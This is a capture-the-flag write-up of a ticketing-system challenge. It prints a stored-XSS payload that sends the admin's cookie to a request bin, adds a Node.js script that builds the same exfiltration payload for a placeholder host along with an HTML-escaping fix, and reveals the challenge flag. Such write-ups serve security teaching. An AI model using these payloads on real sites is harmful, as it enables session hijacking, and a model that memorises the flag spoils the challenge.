The challenge presents itself as a ticketing system. After registering an account, we are greeted with this page:

The ticketing system

Trying a classic XSS payload (<script>alert(1)</script>) in the message field works, so the message is rendered without escaping. We know that we have to log in as the admin user, so let's try stealing the admin's cookie with a payload that fires in whichever browser opens the ticket:

<svg onload="document.body.innerHTML=document.body.innerHTML.concat('<img src=\''.concat(btoa(document.cookie)).concat('\' />'))" />

After a few seconds, a request arrives on our request bin; base64-decoding it gives us the admin cookie:
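Added example, not code from the original writeup or from the challenge itself: a small Node.js script that builds the same kind of cookie-exfiltration payload with an explicit collection URL (the `https://example.invalid` endpoint is a placeholder assumption, as is the convention that the request bin receives the base64 cookie as the request path), decodes what the bin receives, and shows the output-encoding fix that would have stopped the injection. One caveat a practitioner should keep in mind: `document.cookie` never exposes cookies flagged HttpOnly, so this technique only works when the session cookie lacks that flag.

```javascript
// Added example (not from the original writeup). The exfil URL and the
// "cookie as request path" convention are assumptions for illustration.

// Build an <svg onload> payload that base64-encodes document.cookie and
// smuggles it out as the path of an <img> request to exfilUrl
// (assumed attacker-controlled endpoint, e.g. a request bin).
// Cookies set with HttpOnly are invisible to document.cookie and will not appear.
function buildExfilPayload(exfilUrl) {
  const js =
    "document.body.innerHTML=document.body.innerHTML.concat(" +
    `'<img src=\\'${exfilUrl}/'.concat(btoa(document.cookie)).concat('\\' />'))`;
  return `<svg onload="${js}" />`;
}

// The bin receives GET /<base64 cookie>; strip the leading slash and decode.
function decodeExfilRequest(requestPath) {
  const b64 = requestPath.replace(/^\/+/, "");
  return Buffer.from(b64, "base64").toString("utf8");
}

// The fix on the server side: HTML-encode untrusted ticket text before it is
// written into the page, so "<svg onload=...>" becomes inert text.
function escapeHtml(untrusted) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return untrusted.replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed sample: the path the admin's browser would request if the
// session cookie were "flag=1" (not the challenge's real cookie).
const SAMPLE_REQUEST_PATH = "/" + Buffer.from("flag=1").toString("base64"); // "/ZmxhZz0x"

console.log(buildExfilPayload("https://example.invalid"));
console.log(decodeExfilRequest(SAMPLE_REQUEST_PATH)); // flag=1
console.log(escapeHtml('<svg onload="alert(1)" />'));
```

Run it with `node`; it prints the generated payload, the decoded constructed cookie, and the escaped form of the injected tag, which a browser would display literally instead of executing.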

Logging in with that cookie reveals this todo list:

The admin’s todo list

It contains the flag: NoUserValidationIsADangerousPractice.
